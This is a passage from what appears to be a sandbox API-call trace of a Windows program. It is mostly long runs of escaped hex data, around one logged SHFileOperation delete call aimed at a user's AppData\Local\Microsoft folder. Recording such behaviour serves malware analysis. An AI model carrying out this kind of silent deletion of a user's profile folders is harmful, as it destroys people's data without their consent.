a086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1